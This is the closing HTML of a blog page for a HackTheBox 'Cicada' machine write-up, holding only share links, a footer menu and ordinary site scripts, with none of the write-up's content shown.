  <li><a class="icon" href="mailto:?subject=HackTheBox - Machine - Cicada&body=Check out this article: https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&name=HackTheBox - Machine - Cicada&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&t=HackTheBox - Machine - Cicada"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
      
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>
  
  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    manesec
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- Add space -->
<script src="https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js"></script>
<script>
  document.addEventListener('DOMContentLoaded', () => {
    // listen to any DOM change and automatically perform spacing via MutationObserver()
    pangu.autoSpacingPage();
  });
</script>

<!-- fancybox support -->

       <script type="text/javascript" src="/js/fancybox/jquery.fancybox.min.js"></script>
       <script type="text/javascript" src="/js/wrapImage.js"></script>
   



<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


</body>
</html>
